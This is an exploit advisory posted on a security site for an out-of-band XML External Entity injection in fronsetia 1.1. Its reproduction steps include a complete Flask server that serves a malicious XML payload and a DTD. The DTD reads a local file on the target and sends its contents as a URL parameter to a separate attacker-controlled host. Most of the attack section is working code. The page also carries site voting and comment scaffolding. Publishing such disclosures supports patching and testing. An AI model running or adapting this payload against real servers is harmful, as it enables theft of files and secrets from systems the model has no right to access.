fronsetia 1.1 XML Injection

2024.11.25
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

# Exploit Title: XXE OOB - fronsetiav1.1 # Date: 11/2024 # Exploit Author: Andrey Stoykov # Version: 1.1 # Tested on: Debian 12 # Blog: https://msecureltd.blogspot.com/2024/11/friday-fun-pentest-series-15-oob-xxe.html XXE OOB Description: - It was found that the application was vulnerable XXE (XML External Entity Injection) Steps to Reproduce: 1. Add Python3 server to serve malicious XXE payload 2. Add a file on the file system to be read via the application XXE payload echo 123123 > /tmp/123 3. Enter the following URL as input http://192.168.78.128:8080/fronsetia/show_operations.jsp?Fronsetia_WSDL=http://192.168.78.1:10000/testxxeService?wsdl // Python Server Code from flask import Flask, Response, request import logging app = Flask(__name__) # Set up logging logging.basicConfig(level=logging.DEBUG) @app.route('/testxxeService', defaults={'path': ''}) def catch_all(path): app.logger.debug("Serving XXE payload") xml = """<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE data [ <!ENTITY % dtd SYSTEM "http:// 192.168.78.1:10000/data.dtd"> %dtd; ]> <data>&send;</data>""" return Response(xml, mimetype='text/xml', status=200) @app.route('/data.dtd', defaults={'path': ''}) def hello(path): app.logger.debug("DTD requested") xml = """<!ENTITY % file SYSTEM "file:///tmp/123"> <!ENTITY % eval "<!ENTITY &#37; exfil SYSTEM ' http://192.168.78.1:8000/?content=%file;'>"> %eval; %exfil;""" return Response(xml, mimetype='text/xml', status=200) if __name__ == "__main__": app.run(host='0.0.0.0', port=10000)


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top